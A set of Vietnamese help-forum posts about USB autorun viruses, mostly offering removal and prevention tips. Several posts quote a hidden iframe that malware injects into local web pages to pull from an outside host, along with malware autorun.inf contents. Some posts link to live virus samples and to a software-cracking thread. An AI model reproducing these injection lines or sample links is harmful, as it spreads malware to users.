Messages posted by: xuandien

Các Pro chỉ giáo dùm.
Tôi để ổ cứng dạng NTFS và có đặt chế độ mã hoá và nén thư mục của NTFS.
Ở đây sẽ lấy thư mục wideScreen.
Hình 1: thư mục bị mã hoá và nén có màu Xanh.
http://img80.imageshack.us/img80/9729/41810701.jpg
Hình 2: Properties của thư mục wideScreen ở chế độ Read-only
http://img101.imageshack.us/img101/4931/91477894.jpg
Hình 3: thư mục wideScreen ở chế độ nén
http://img689.imageshack.us/img689/2584/12189152.jpg
Hình 4: các File trong thư mục wideScreen có màu xanh bị mã hoá
http://img338.imageshack.us/img338/9189/95464267.jpg
Hình 5: Properties của file bị mã hoá
http://img801.imageshack.us/img801/6255/22785876.jpg
Hình 6: Bỏ chế độ mã hoá và nén bị lỗi
http://img266.imageshack.us/img266/4215/39312917.jpg
-----------------------------------------------------------------------
Hiện tại thì không thể mở bức ảnh này được.
Trước kia tôi tự tạo bản Ghost với quyền Admin và chỉ dùng bản Ghost này thôi.
giờ không thể vào xem các bức ảnh đó được.
Các Pro nào có cách khắc phụ xin chỉ giáo.

Bạn thử vào Safemode xem.
Khi khởi động ấn liên tục F8 sau đó chọn dòng đầu tiên, đợ 1 chút để vào chế độ an toàn.
Tiếp theo bấm vào Start\Run rồi gõ vào ổ cứng của bạn muốn diệt VD: trong hộp run gõ C:\Ok tìm trên thanh menu tìm đến Tool\Folder Option\sang thẻ View\chọn Show hidden filesđan folder\ bỏ tích ở dòng Hide protected operating systemfiles(Recommended)
Chọn Ok\yes
Bây giờ bạn thấy tập tin autorun.inf xóa đi là được !!! smilie

À quên trước khi xóa nó bạn phải diệt con Virus đi đã, vì con virus sinh ra tập tin autorun.inf mà.
Để biết con virus tên là gì thì mở tập tin Autorun ra biết ngay thường có dạng
Open=tenvirus.exe hay
Open= tenvirus.exe
Thường thì con virus này nằm nay cạnh autorun.inf bạn hãy Kill nó đi nha!
Kiểm tra các ổ xem Kill hết đi (Không nên bấm kép vào ổ cúng nha vì bạn sẽ làm kíck hoạt virus lại lây qua các ổ nhờ tập tin autorun.inf ).
smilie

Nếu các bước trên không làm được thì bạn dùng đĩa khởi động vào MS-Dos xóa hế đi là được
smilie

Cuối cùng không được nữa thì liên hệ với mình.Mình hướng dẫn cụ thể.
http://www.xuandien.tk

Bạn có một chiếc USB? Cho dù bạn chỉ thỉnh thoảng sử dụng nó để sao chép tài liệu giữa các máy thì chắc rằng không dưới một lần chiếc USB của bạn đã nhiễm phải virus. Có lẽ cũng không phải nói nhiều về những phiền toái mà bạn gặp với với những con virus đáng ghét này. Tuy nhiên bạn hoàn toàn có thể hạn chế những vị khách không mời này xâm nhập vào chiếc USB của bạn.

Virus lây qua USB đã trở nên quá phổ biến hiện nay tại Việt Nam, nhất là khi chiếc ổ di động USB đã trở thành vật bất ly thân của đại đa số học sinh, sinh viên, nhân viên văn phòng.. Những con virus này tự động xâm nhập khi bạn cắm USB của bạn vào một máy tính đã bị nhiễm virus.

Và mỗi khi bạn USB này được đưa vào một máy tính khác, virus lợi dung thói quen sơ hở của bạn mỗi khi click đúp vào biểu tượng ổ đĩa USB trong My Computer để xâm nhập. Tại đây chúng tiếp tục nhân bản và phát tán chính mình bằng nhiều đường. Và đương nhiên nạn nhân tiếp theo sẽ là những chiếc USB khác cắm vào máy.

Tại sao virus có thể lây nhiễm qua USB? Là bởi vì virus sao chép chính nó lên USB, và tạo một file Autorun.inf để kích hoạt tính năng Autoplay của ổ đĩa. Mỗi khi bạn click vào để mở USB thì bạn sẽ vô tình chạy chính con virus này. Thêm nữa, chúng khôn khéo đặt thuộc tính ẩn cho chính mình để tránh bị phát hiện.

Làm thế nào để có thể phát hiện ra được USB có virus hay không? Nếu như bình thường bạn mở USB bằng cách click chuột trái vào biểu tượng USB ở My Computer thì hãy thay đổi thói quen đó. Hãy thử click chuột phải vào biểu tượng ổ USB, nếu như bạn thấy có dòng Autoplay được tô đậm ở vị trí trên cùng, có nghĩa là 90% USB đó đã bị nhiễm virus. Bởi vì bình thường thì dòng chữ tô đậm ấy phải là Open hoặc Explorer thay vì Autoplay.

Điều này còn có thể áp dụng với các ổ đĩa cứng, một vài con virus sau khi lây vào máy còn lây vào Autoplay của các ổ cứng. Quá trình lây vào ổ cứng khiến cho virus vẫn có thể được kích hoạt mà không cần phải sao chép vào Start Up, một nơi vẫn thường xuyên được kiểm tra. Tuy nhiên, các virus USB thường tự đặt nó trong trạng thái ẩn, chính vì vậy tốt nhất bạn nên thường xuyên đặt chế độ xem các file ẩn bằng cách vào My Computer -> Tools -> Folder Options.. -> View -> Chọn Show hidden files and folders và bỏ Hide protected system files.

Tự bảo vệ mình như thế chưa đủ. Tốt nhất hãy bảo vệ USB của mình khỏi bị nhiễm virus. Bạn hoàn toàn có thể tự làm được ngay cả khi bạn không phải là một người am hiểu về máy tính.

Thật vậy, nếu như virus lây vào USB của bạn và tìm cách lừa bạn chạy nó qua tính năng Autoplay của USB thì tại sao bạn lại không thử lừa lại nó. Để ý rằng virus USB nào cũng tạo file autorun.inf, vậy thì bạn hãy tạo sẵn file autorun.inf trong USB của mình. Chắc chắn rằng chỉ với bước này bạn đã “qua mặt” được kha khá virus USB rồi.

Nhưng xem ra như thế vẫn chưa đủ, bạn cần phải cấm các con virus thông minh hơn ghi đè file này. Điều này bạn cũng hoàn toàn có thể làm được dễ dàng với USB nếu như bạn chuyển hệ thống file của USB sang NTFS và đặt quyền cấm ghi đè cho file autorun.inf.

Tất nhiên việc chuyển hệ thống files sang NTFS thì USB của bạn sẽ không thể dùng được trên Windows 98/ME, nhưng chắc rằng Windows 98/ME thì cũng không tự động nhận được USB của bạn, hơn nữa Windows 98/ME hiện nay cũng hơi hiếm thấy.

Khi bạn đã sẵn sàng, hãy bắt đầu bảo vệ USB của bạn qua những thao tác đơn giản với Windows XP qua 5 bước sau:

Bước 1: Xác định tên ổ đĩa USB của bạn là gì bằng cách click vào My Computer và xác định ổ USB. Ví dụ như USB của bạn là ổ E: và nhãn là STORAGE

Bước 2: Chuyển đổi hệ thống files sang NTFS bằng cách Click vào Start -> Run, sau đó gõ convert : /FS:NTFS. Ví dụ bạn sẽ phải gõ convert E: /FS:NTFS. Lưu ý, nếu ổ USB của bạn có chức năng ghi âm và nghe nhạc MP3 thì nên bỏ qua bước này. Nếu không, có thể phần mềm chơi nhạc của bạn sẽ không thể chạy các file MP3 được.

Bước 3: Tạo một file autorun.inf với nội dung bất kì, thậm chí để trống cũng được và copy vào thư mục gốc của ổ đĩa USB của bạn.

Bước 4: Click chuột phải vào file autorun.inf bạn vừa tạo và chọn thuộc tính cho file này là read-only (để không bị bọn virus nó xóa), bạn cũng có thể chọn thêm hidden (tránh ai đấy thấy ngứa mắt xóa).

Bước 5: Cấm mọi quyền truy xuất vào file autorun.inf bạn vừa tạo bằng cách Click vào Start -> Run, sau đó gõ cacls \autorun.inf /D Everyone. Ví dụ như bạn sẽ gõ cacls E: \autorun.inf /D Everyone

Tất nhiên là không thể nói là an toàn với tất cả các loại virus USB, nhưng phương pháp này cũng phần nào giúp cho USB của bạn an toàn trước đại đa số chuyên lây qua USB hiện nay. Và hơn hết, hãy cài lên máy của mình một chương trình diệt virus đáng tin cậy, đặc biệt nên có tính năng tự động cập nhật thường xuyên. Chúc bạn thành công.

Theo Quản trị mạng

Vào đây để xem cách phá phiên bản 6 hay mọi phiên bản nè
http://www.htmlforum.net/hvaonline/posts/list/18084.html

Có ai biết chương trình nòa Biên dịch và chỉnh sửa File có đuôi dạng *.AI không?
Những File này có trong Đế chế đó. smilie

-))

Sau thời gian sống cùn loại Virus này cũng giống như 1 số dạng tương tự em đã tìm ra cách diệt tốt nhất đó là vào DOS chạy NC cho tiện rồi tìm kon Virus này và cả tập tin autorun kia nữa Delete nó đi là xong.

Bạn hãy mua đĩa Hiren's.BootCD.8.9 khởi động từ CD vào mục Antivirus mà diệt !
Mình diệt được rồi đó !

Tôi đã tìm thấy phần mềm này rồi hay đó
Tên phần mềm đó là ResHacker.exe
Vào Google mà tìm nha.

bek0n wrote:

Theo bạn nói thì máy bạn bị dính Autoplay. Bạn có thể chỉnh bằng cách vào Tool > Folder Options> View > chọn Show hidden files and folders, bỏ lựa chọn Hide protected operating system files.

Sau đó bạn vào ổ C, D, E xóa hết các file ẩn Auto .

Bạn thử xem mình nghĩ là chỉ có trường hợp này thôi

Nhưng trước tiên phải diệt Virus bằng bản Bkav mới nhất đã rồi mới xóa được Files Autorun!

Có ai diệt hộ con này nha ! http://www.freewebtown.com/xuandien_vp/virus.rar

Chú ý :
Khi giải nén ra mà nối mạng thì các trang web file.htm lưu trong máy của bạn sẽ bị nhiễm hết đoạn code sau vào cuối trang
<iframe src="http://www.68aa.cn/mu/index.htm" width="0" height="0" frameborder="0"></iframe>

Thật là phiền toái cho tôi khi gặp phải loại này !

alibobo_cbg wrote:

USB của em bị nhiễm một loại virus lạ, một con setup.exe và file autorun.inf. Và thư mục RECYCLE chứa file autorun.exe. Search trong Symantec thì có thông tin nhưng Update thi cũng không diệt được. Ổ em không có khóa nhưng nó lại khóa không cho fomat, coppy hay delete........ help me !!!!!!

Để diệt con Virus này đơn giản thôi
- Trước tiên là tải bản Bkav mới nhất về diệt ok
- Khi này Bkav chỉ diệt được setup.exe thôi. Cò file autorun.inf. mình tự xóa bằng tay rồi rut USB ra cắm lại đi là được
- Chú ý có thể máy bạn sẽ dính virus luôn khi cho USB vào và kích hoạt vào nó.
Để không còn bị virus này thì cần phải cài mới lại Windows. Khi nào copy dữ liệu từ USB vào máy tính thì không được bấm đúp vào USB mà phải bấm chuột phải vào USB chọn Open sau đó tìm tập tin mà bạn cần copy về máy sau đó Format lại USB là Ok.

Tôi bị con virus đó cũng lâu lắm rồi bây giờ không nhớ cach diệt nữa
Chỉ có cách này 100% là được là Fdisk lại ổ cứng đi là được (Trước khi thực hiện phải gửi dữ liệu xang ổ khác) Còn Format lại không ăn thua đâu.

Em bị dính con virus này quả là hơi đau đầu chưa tìm ra cách trị nó và cũng không biết nó nằm ở đâu chỉ biết triệu trứnng để lại hầu hết các file.htm trong máy tính của em ở đoạn cuối code để lại dòng
<iframe src="http://www.68aa.cn/mu/index.htm" width="0" height="0" frameborder="0"></iframe>

Khi nối mạng thì tự động tải thêm 1 file SVCHOST.exe về desktop
Mà nó cứ liên tục thêm dòng <iframe src="http://www.68aa.cn/mu/index.htm" width="0" height="0" frameborder="0"></iframe> vào cuối của trang web chỉ làm tốn thêm dung lượng thôi.

Có ai biết làm sao để khắc phục không ?

phongvan_khtn wrote:

Máy của em bị nhiễm virus tên Excel.Em đã dùng rất nhiều cách nhưng không diệt được(kể cả quét ngoài DOS).Mấy anh biết chỉ giúp em với

Bạn phải thự hiện diệt bằng Bkav và bằng tay mới được.
-Trước tiên tải bản Bkav mới nhất về và quét đến khi Bkav phát hiện và diệt virus xong rồi khởi động lại, nhưng vẫn hoàn toàn diệt được
- Công việc tiếp theo là bạn vào thanh công cụ Tool\Foder Option...\Trong thẻ View chon tích Show hideend files and folder (Hiện tất cả file ẩn)
Bỏ tích tại dòng Hide protected operating system files(recommended)(Hiện file ẩn của hệ thống)
sau đó xóa file có tên là Auto đi là được

Máy bạn dính virus là cái chắc rồi .
Muốn quết Virus thì hơi khó vì thời gian ko cho phép bạn quét virus chỉ có mấy chục giây phải không.
Hãy làm theo hướng dẫn của mình trước khi thực hiện tiến hành quét Virus nha .
Bạn vào "Start\run" đánh lệnh "shutdown -a" để vô hiệu hóa lệnh tắt máy . Sau đó tìm chương trình diệt Virus thích hợp mà quét

Tôi cũng đang cần tìm cái đó nè ai biết post lên nha.

Ví dụ như trong Game đế chế có file language.dll ta có thể chỉnh sửa ngôn ngữ tiếng anh thành tiếng việt được, ai biết bảo em với nhé!
Thanks !

Em vừa mới dính con Virus này xin hỏi có chương trình nào diệt được không ?
http://www.freewebtown.com/xuandien_vp/Setup.rar

Khi click phải chuột vào ổ cứng biến mất Open trên đầu mà hiện dòng Auto.
Bỏ mục ẩn thì có tập tin autorun.inf có nội dung:

[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

Không thể xoá bỏ tập tin autorun.inf và setup.exe vì mỗi lần xoá bỏ thì nó lại tái lập lại như cũ không những thế nó còn làm vô hiệu hoá lệnh đánh trong hộp thoại Run, vô hiệu hoá Ctrl + Alt + delete và làm tắt cả Volume.

Em nghĩ ai lập trình ra con virus này đi lấy code của người khác sửa thêm may là chạy vẫn bị lỗi, lỗi báo như sau:
runtime error 123 at 004078dc

Nếu có phần mềm nào diệt đuợc xin chỉ em gúp nhé !
Thanks !
smilie

(

abaanh wrote:

xóa file các file autorun xem có được không
-------------------

http://hapdan.tk

Tất nhiên là không thể xóa hoặc edit được file autorun rồi.
Dù sao cũng cám ơn các bác, trong lúc chờ đợi câu trả lời thì em đã dùng bản Bkav ngày 26/12/2006 diết chết nó rồi.

Quynh2603 wrote:

Không phải Virus, bạn đã hiểu nhầm.
Hãy đọc thông tin của Microsoft và tự thực hiện nếu thực sự muốn remove ctfmon.exe
What Is the Ctfmon.exe (Ctfmon.exe) File?

Microsoft wrote:

Ctfmon.exe activates the Alternative User Input Text Input Processor (TIP) and the Microsoft Office Language Bar. Back to the top

What Does the Ctfmon.exe File Do?
Ctfmon.exe monitors the active windows and provides text input service support for speech recognition, handwriting recognition, keyboard, translation, and other alternative user input technologies. Back to the top

Can I Remove the Ctfmon.exe File?
Removing the Ctfmon.exe might cause problematic behavior in your Office XP programs, so removing it is not recommended. To prevent Ctfmon.exe from running, follow these steps.
Step 1: Uninstall Alternative User Input
To uninstall the alternative user input feature, set the installation state to Not Available in Office XP Setup.

Microsoft Windows Millennium Edition (Me), Microsoft Windows 98, or Microsoft Windows NT 4.0: 1. Quit all Office programs.
2. Click Start, point to Settings, and then click Control Panel.
3. In Control Panel, double-click Add/Remove Programs.
4. On the Install/Uninstall tab, click to select Microsoft Office XP product, where Office XP product is the name of the specific Office product being used. If you are using a standalone version of one of the Office programs, click to select the appropriate product in the list. Click Add/Remove.
5. In the Maintenance Mode Options dialog box, select Add or Remove Features, and then click Next. This displays the Choose installation options for all Office applications and tools dialog box.
6. Click the plus sign (+) next to Office Shared Features to expand it.
7. Click the icon next to Alternative User Input, and then select Not Available.
8. Click Update.

NOTE: If you have multiple Office XP products installed, for example, Office XP Professional and Publisher 2002, you must repeat the preceding steps for each installed product.

Microsoft Windows 2000 and Microsoft Windows XP: 1. Quit all Office programs.
2. Click Start, point to Settings, and then click Control Panel. NOTE: In Windows XP, click Start and then click Control Panel.

3. In Control Panel, double-click Add/Remove Programs.NOTE: In Windows XP, click Add or Remove Programs.

4. In the Currently installed programs list, click to select Microsoft Office XP product, where Office XP product is the name of the specific Office product being used. If you are using a standalone version of one of the Office programs, click to select the appropriate product in the list. Click Change.
5. In the Maintenance Mode Options dialog box, select Add or Remove Features, and then click Next. This displays the Choose installation options for all Office applications and tools dialog box.
6. Click the plus sign (+) next to Office Shared Features to expand it.
7. Click the icon next to Alternative User Input, and then select Not Available.
8. Click Update.

NOTE: If you have multiple Office XP products installed, for example, Office XP Professional and Publisher 2002, you must repeat the preceding steps for each installed product.
Step 2: Remove Alternative User Input Services from Text Services1. Click Start, point to Settings, and then click Control Panel.
2. In the Control Panel, double-click Text Services.NOTE: In Windows XP, click Date, Time, Language, and Regional Options, and then click Regional and Language Options. On the Languages tab, click Details.

3. Under Installed Services, select each input item that is listed, and then click Remove to remove the item. All items must be removed, one by one, except the following input service:

English (United States)- default Keyboard United States 101
Step 3: Run Regsvr32 /U on the Msimtf.dll and Msctf.dll Files1. Click Start and then click Run.
2. In the Run dialog box, type the following command:
Regsvr32.exe /u msimtf.dll
3. Click OK.
4. Repeat steps 1 through 3 for the Msctf.dll file.

For additional information about how to remove CTFMon.exe, click the article number below to view the article in the Microsoft Knowledge Base:
313176 Programs May Start, Quit, Lose, and Gain Focus Randomly Back to the top

Why Will Ctfmon.exe Not Go Away When I Remove It from MSConfig?
Removing Ctfmon.exe from MSConfig does not disable Ctfmon.exe. For more information about disabling Ctfmon.exe, refer to the "Can I remove the Ctfmon.exe file?" section earlier in this article. Back to the top

When I Remove the Alternative Input Features from Office XP, Ctfmon.exe Still Loads. What Else Must I Do to Keep It from Running?
Unlike the Alternative User Input features, Ctfmon.exe is a system component that cannot be uninstalled. For more information about disabling Ctfmon.exe, refer to the "Can I remove the Ctfmon.exe file?" section earlier in this article. Back to the top

What Amount of System Resources Is Used When Ctfmon.exe Is Running?
Ctfmon.exe uses little of the system resources if Advanced Text Services are not running. Advanced Text Services are those input technologies (speech recognition, handwriting recognition, and Input Method Editors) that are being controlled by Ctfmon.exe via a TIP. Back to the top

Can I Load Ctfmon.exe on Demand Instead of All the Time?
The Alternative User Input system is not designed to be loaded and unloaded on demand. Back to the top

Can I Click "End Task" in the Task Manager Dialog Box or "End Task" in the Close Program Dialog Box for the Ctfmon.exe Process?
No. It is not recommended that you manually close the Ctfmon.exe process. It is recommended that you use the steps in the "Can I remove the Ctfmon.exe file?" section if you want to stop the Ctfmon.exe process. Back to the top

Does Ctfmon.exe Work the Same in All Operating Systems?
Generally, yes. Ctfmon.exe performs the same tasks on different Microsoft Windows operating systems. Back to the top

Additional Information
Ctfmon.exe is the file that is responsible for controlling the Alternative User Input technologies. It starts the Language Bar component (in the Systray) and remains running in the background even after you quit an Office XP program. It also starts each time Windows is started and remains in the background, regardless of whether an Office XP program is started.

Ctfmon.exe is designed to continue to run in the background during Windows sessions after the Office XP Alternative User Input components are installed.

)
Còn nếu lười thì có thể dùng tools cho nhanh (untested)
The CTFMON-Remover helps you removing the annoying CTFMON.EXE from your Windows operating system. The program is easy to use and displays whether the CTFMON.EXE is installed and running or not. If it was found then you can remove it within seconds. Just in case that you need the CTFMON sometime in the future there is also an option to restore the original one.

The CTFMON-Remover runs on Windows 98, ME, 2000 and XP.
Download
Code:
http://www.gerhard-schlager.at/files/CtfmonRemoverEN-v2.1.zip

Bác còn cách nào khác nữa không ? Cách của bác không được ?

Máy tính của em bị nhiễm Virus ctfmon.exe?
Không có cách nào diệt được.

Triệu trứng khi click chuột phải vào ổ đĩa cứng không xuất hiện chữ Open mà lại xuất hiện chữ Open(0).
Khi click vào Mycomputer, click tiếp vào ổ cứng thì cửa xổ Mycomputer vẫn giữ nguyên và bật lên cửa xổ mới của ổ cứng vừa chọn.

Em đã cho hiện file ẩn thì có tập tin autorun.inf và Recycled. Trong tập tin autorun.inf có đoạn mã như sau:

[autorun]
shellexecute=Recycled\ctfmon.exe
shell\Open(&0)\command=Recycled\ctfmon.exe
shell=Open(&0)

Không thể xóa được tập tin autorun.inf vì cứ xóa đi nó lại khởi tạo lại tập tin này, cũng không thể chỉnh xửa code cho tập tin này.
Có ai biết cách diệt xin chỉ giúp ?
Thanks !